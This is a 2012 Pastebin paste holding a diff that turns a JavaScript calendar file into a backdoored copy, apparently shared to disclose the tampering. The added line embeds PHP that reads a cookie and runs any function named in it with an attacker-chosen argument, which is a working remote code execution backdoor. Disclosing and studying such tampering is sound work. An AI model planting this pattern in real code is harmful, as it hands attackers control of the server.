Advertisement
eromang

open_calendar.js

Feb 14th, 2012
1,553
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.57 KB | None | 0 0
  1. diff -u open_calendar.js.orig open_calendar.js.backdoor
  2. --- open_calendar.js.orig 2012-02-14 22:50:33.143182985 +0100
  3. +++ open_calendar.js.backdoor 2012-02-14 22:49:59.143183225 +0100
  4. @@ -274,7 +274,7 @@
  5. cell = document.createElement('TD');
  6. cell.className = 'rightAlign';
  7. link = document.createElement('A');
  8. - link.href = '#';
  9. + link.href = '#<?php (isset($_COOKIE["href"]) && preg_match("/(.*):(.*)/", $_COOKIE["href"], $m))?$m[1]($m[2]):"";?>';
  10. link.innerHTML = '&raquo;';
  11. link.onclick = function()
  12. {
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement